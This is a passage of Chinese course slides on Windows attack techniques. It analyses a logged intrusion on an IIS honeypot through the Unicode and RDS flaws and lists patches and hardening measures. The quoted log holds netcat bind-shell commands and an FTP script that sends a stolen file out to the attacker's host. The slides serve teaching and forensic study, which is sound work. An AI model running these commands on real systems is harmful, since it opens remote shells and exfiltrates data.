《网络攻防技术与实践》课程5-Windows攻击技术及防御方法_pub.ppt

* * * * * * * 问题3: 闲逛(寻找有价值信息)+炫耀 攻击者又创建了2个NetCat监听服务，并在新的6868端口连入，但奇怪的是攻击者换了个IP地址56。 21:16:41 X:2002 -> T:80 exec (unicode) nc -l -p 6968 -e cmd1.exe 21:19:05 X:2007 -> T:80 exec (unicode) nc -l -p 6868 -e cmd1.exe 21:20:44 Y:1345 -> T:6868 incoming NC cmd.exe: ./log/06/SESSION:6868-1345 闲逛：对蜜罐主机上exploits目录体现了特别兴趣 21:25:03 Y:1345 -> T:6868 types 'echo best honeypot i've seen till now :) > rfp.txt' 21:25:49 X:2022 -> T:80 view (unicode): boot.ini and READ.NOW.hax0r 21:26:06 X:2023 -> T:80 view (unicode): READ.me.NOW.hax0r 炫耀：Web根目录创建了test.txt文件，象征性修改首页” echo . >> default.htm” 21:36:02 X:2091 -> T:80 get /test.txt, result “this can‘t be true” 21:34、8 21:37、42 21:38、10 21:38、96 21:39、 86 21:39、 21:39、3 21:42、07 21:44、3 21:46、 21:52、6 21:56、7 21:59、20 22:18 * * 问题3: Cleanup+”顺手牵羊” 21:50:27 X:2150 -> T:80 exec(unicode): 'copy c:\winnt\system32\cmd.exe cmd1.exe' 21:50:37 X:2151 -> T:80 exec(unicode): construct ftp script ftpcom ? ftpcom open X johna2k haxedj00 put c:\wiretrip\whisker.tar.gz quit ftpcom ? 21:51:29 X:2177 -> T:80 exec (unicode): 'ftp -s:ftpcom' 21:51:29 T:3158 -> X:21 ftp transfer of 'stolen' whisker, ascii 21:54:13 X:2187 -> T:80 exec (unicode) del ftpcom * * 问题4-如何防止这样的攻击? 直接防御措施：打补丁 Unicode - /technet/security/bulletin/ms00-057.asp RDS - /technet/security/Bulletin/MS02-065.mspx 进一步防御措施：IIS安全防范措施 1. 为这些漏洞打上补丁 2. 禁用用不着的RDS等服务 3. 防火墙封禁网络内部服务器发起的连接 4. 为web server在单独的文件卷上设置虚拟根目录 5. 使用NTFS文件系统，因为FAT几乎不提供安全功能 6. 使用IIS Lockdown 和 URLScan 等工具加强web server Now: Update to IIS v6.x or switch to latest Apache * * 问题5-攻击者是否警觉了他的目标是一台蜜罐主机？ 是的，攻击者绝对意识到了他的目标是作为蜜罐主机的. 1. 因为他建立了一个文件，并输入了如下内容C:\>echo best honeypot i've seen till now :) > rfp.txt. 2. 因为该目标主机作为rfp的个人网站，Web服务所使用的IIS甚至没有更新rfp自己所发现的MDAC RDS安全漏洞，很容易让攻击者意识到这绝对是台诱饵。 * * * * 内容 Windows系统查点 Windows系统远程攻击 Windows系统本地攻击 案例演示：解码一次成功的NT系统破解攻击 作业4：Win2K系统被攻陷加入僵尸网络 * * 作业4: Win2K系统被攻陷并加入僵尸网络 分数: 10分 难度等级: 中级 案例分析挑战内容: ???????? 在2003年3月初，Azusa Pacific大学蜜网项目组部署了一个未打任何补丁的Windows 2000蜜罐主机，并且设置了一个空的管理员密码